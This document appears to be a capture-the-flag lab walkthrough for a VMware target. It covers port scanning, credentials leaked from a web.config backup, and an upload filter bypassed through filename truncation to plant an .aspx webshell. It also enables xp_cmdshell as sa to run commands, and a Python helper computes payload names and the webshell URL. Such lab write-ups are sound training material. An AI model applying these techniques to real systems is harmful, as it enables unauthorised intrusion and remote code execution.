Set up the environment and open it in VMware; the password is admin123.
Port Scanning#
The target's firewall is on by default and blocks ICMP, so a ping sweep finds nothing; scan the ports directly with host discovery skipped (for example nmap -Pn).
Two ports matter: 1433 (MSSQL) and 27689 (the web application).
Web Application#
Browsing to port 27689 shows the following login page:
Trying weak passwords on it gets nowhere.
Directory Scanning#
Run a directory scan with Yujian.
It turns up a robots.txt file:
It also finds a backup file, web.config.bak. Downloading it reveals the database account and password.
Database Connection#
The port scan showed 1433 open, so connect to the database with Navicat using those credentials.
The database contains a key.
Next, look through the tables for the website's backend (admin) password.
Backend Login#
Logging in to the backend with that account and password shows a key.
The backend has a file upload function.
Requesting one of the uploaded files at a guessed URL returns an error page that leaks the physical upload path:
D:\web\upfile\affix\
File Upload#
First upload an ordinary image file.
In the screenshot above, the entry numbered 44 carries a notice about file names:
Note: if the file name is too long, the system truncates it to its first 32 characters (counting the system-time prefix) and uses that as the stored name. Please avoid overly long file names. We apologize for any inconvenience.
That truncation can be turned against the upload filter: choose a name such that the 32-character cut lands exactly after ".aspx", so the trailing ".jpg" that satisfies the image check is dropped from the stored name.
Stored names have the form: 18-digit number + "-" + original file name stem + extension. The 18-digit prefix and the "-" take 19 characters and ".aspx" takes 5, so 24 of the 32 characters are spoken for and the stem must be exactly 8 characters. Upload 88888888.aspx.jpg and it is stored as <18 digits>-88888888.aspx. If the stem is shorter, ".jpg" survives the cut; if it is longer, ".aspx" is cut off as well, so the length has to be exact.
Prepare the following files:
The uploaded file will look like this:
Webshell Connection#
Build the webshell URL from the leaked physical path: D:\web\upfile\affix\ corresponds to /upfile/affix/ under the web root.
D:\web\upfile\affix\
http://192.168.10.22:27689/upfile/affix/638252986630625000-88888888.aspx
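The length arithmetic from the upload step and the URL built here, worked through as an added example in Python (this is not code from the original write-up). It assumes, as labelled in the code, that the 18-digit prefix is a .NET DateTime.Ticks value and that the server keeps exactly the first 32 characters of "<prefix>-<original name>", as the notice states; the base URL, the ticks value and the stem 88888888 are taken from the URL above. It also generalises the calculation to other server-side extensions.

```python
# Added example, not part of the original write-up.
# Models the upload-naming rule from the backend's notice and works out how long
# the original file name must be so that the 32-character cut lands right after
# the wanted extension.
# Assumptions (not confirmed by the page): the 18-digit prefix is a .NET
# DateTime.Ticks value, and the server stores exactly the first 32 characters
# of "<ticks>-<original name>".
from datetime import datetime, timedelta

MAX_LEN = 32      # from the notice: stored names are cut to the first 32 characters
TICKS_LEN = 18    # observed: 638252986630625000 is 18 digits
SEP = "-"


def stored_name(ticks: int, original_name: str) -> str:
    """Simulate the server-side naming: "<ticks>-<original>" cut to MAX_LEN."""
    return f"{ticks}{SEP}{original_name}"[:MAX_LEN]


def stem_length_for(ext: str) -> int:
    """Stem length that makes `ext` the last thing kept after the cut."""
    budget = MAX_LEN - TICKS_LEN - len(SEP) - len(ext)
    if budget < 1:
        raise ValueError(f"no room for a stem with extension {ext!r}")
    return budget


def payload_name(ext: str, stem_char: str = "8", decoy_ext: str = ".jpg") -> str:
    """Build an upload name such as 88888888.aspx.jpg: the decoy .jpg passes the
    image check, the truncation removes it again."""
    return stem_char * stem_length_for(ext) + ext + decoy_ext


def lands_on(ext: str, ticks: int, original_name: str) -> bool:
    """True only if the stored name ends exactly with `ext` (stem neither too short nor too long)."""
    stored = stored_name(ticks, original_name)
    return stored.endswith(ext) and len(stored) == MAX_LEN


def webshell_url(base: str, ticks: int, original_name: str) -> str:
    # The leaked physical path D:\web\upfile\affix\ maps to /upfile/affix/ under the web root.
    return f"{base.rstrip('/')}/upfile/affix/{stored_name(ticks, original_name)}"


def decode_ticks(ticks: int) -> datetime:
    """Interpret the prefix as .NET ticks (100 ns units since 0001-01-01).
    Only a sanity check of the assumption: a plausible date supports it."""
    return datetime(1, 1, 1) + timedelta(microseconds=ticks // 10)


if __name__ == "__main__":
    ticks = 638252986630625000  # value seen in the write-up's final URL
    name = payload_name(".aspx")
    print(name, "->", stored_name(ticks, name))
    print(webshell_url("http://192.168.10.22:27689", ticks, name))
    print("prefix decodes to", decode_ticks(ticks))
    for ext in (".aspx", ".asp", ".ashx"):
        print(ext, "needs a stem of", stem_length_for(ext), "characters")
    # Off-by-one cases: one character too few keeps .jpg, one too many loses .aspx
    print(lands_on(".aspx", ticks, "8888888.aspx.jpg"), lands_on(".aspx", ticks, "888888888.aspx.jpg"))
```

The prefix decodes to a timestamp in July 2023, which is consistent with the ticks assumption; the page itself does not say how the prefix is generated, so treat that decoding as a check rather than a fact.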
Checking the current user from the webshell shows ordinary user privileges, not administrator.
The second key is in the website's web directory.
The last key is on the desktop of the Administrator account, which this user has no permission to read.
Database Connection to Retrieve Key as sa#
Keep looking for configuration files: D:/web/web.config.bak.2017-12-12
contains the database's sa account.
Log in to the database as sa and use xp_cmdshell to list the Administrator's desktop (桌面 is the literal Desktop folder name on a Chinese-locale Windows). xp_cmdshell is disabled by default on SQL Server 2005 and later; sa is sysadmin, so it can be switched back on with sp_configure first.
EXEC sp_configure 'show advanced options', 1; RECONFIGURE;
EXEC sp_configure 'xp_cmdshell', 1; RECONFIGURE;
use master;
exec master..xp_cmdshell 'dir "c:\Documents and Settings\Administrator\桌面\"'
This lists the desktop contents and yields the last key.
Environment Link#
Link: https://pan.baidu.com/s/140cLWvmzs0CauuA_JOro5A
Password: 6666